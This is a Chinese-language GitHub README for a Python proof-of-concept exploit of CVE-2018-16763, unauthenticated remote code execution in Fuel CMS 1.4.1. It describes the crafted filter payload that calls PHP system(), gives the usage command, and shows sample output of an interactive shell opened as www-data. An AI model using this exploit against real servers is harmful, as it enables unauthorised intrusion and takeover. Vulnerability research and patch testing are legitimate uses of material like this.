estebanzarate/CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

GitHub: estebanzarate/CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

这是一个针对Fuel CMS 1.4.1版本未授权远程代码执行漏洞的概念验证工具,能够自动化验证漏洞并建立交互式Shell。

Stars: 0 | Forks: 0

# CVE-2018-16763 — Fuel CMS 1.4.1 远程代码执行 (PoC) ## 工作原理 1. 发送一个 GET 请求到 `/fuel/pages/select/`,其中包含一个精心构造的 `filter` 载荷,该载荷会调用 PHP 的 `system()` 函数执行指定命令。 2. 使用正则表达式从 HTTP 响应中解析反射的输出。 3. 将命令输出直接返回给交互式 Shell。 ## 环境要求 - Python 3 - 安装依赖: ``` python3 -m venv venv source venv/bin/activate python3 -m pip install requests prompt_toolkit ``` ## 使用方法 ``` python3 exploit.py -t http://TARGET ``` **示例:** ``` $ python3 exploit.py -t http://10.10.10.10 [*] Testing command execution... [+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) [+] Shell opened. Type 'exit' or Ctrl+C to quit. Shell> whoami www-data Shell> hostname fuel-cms Shell> exit ``` ## 参考资料 - [CVE-2018-16763](https://nvd.nist.gov/vuln/detail/CVE-2018-16763) - [EDB-47138](https://www.exploit-db.com/exploits/47138) ## 致谢 - **发现与原始漏洞利用:** Syed Sheeraz Ali - **代码优化与交互式 Shell:** [Esteban Zárate](https://github.com/estebanzarate)
标签:CISA项目, CVE, CVE-2018-16763, Exploit, Fuel CMS, Maven, PoC, Python, RCE, Shell, Web安全, 代码执行, 后门, 命令执行, 安全, 数字签名, 无后门, 暴力破解, 未经身份验证, 漏洞验证, 编程工具, 网络安全, 自动化攻击, 蓝队分析, 超时处理, 远程代码执行, 隐私保护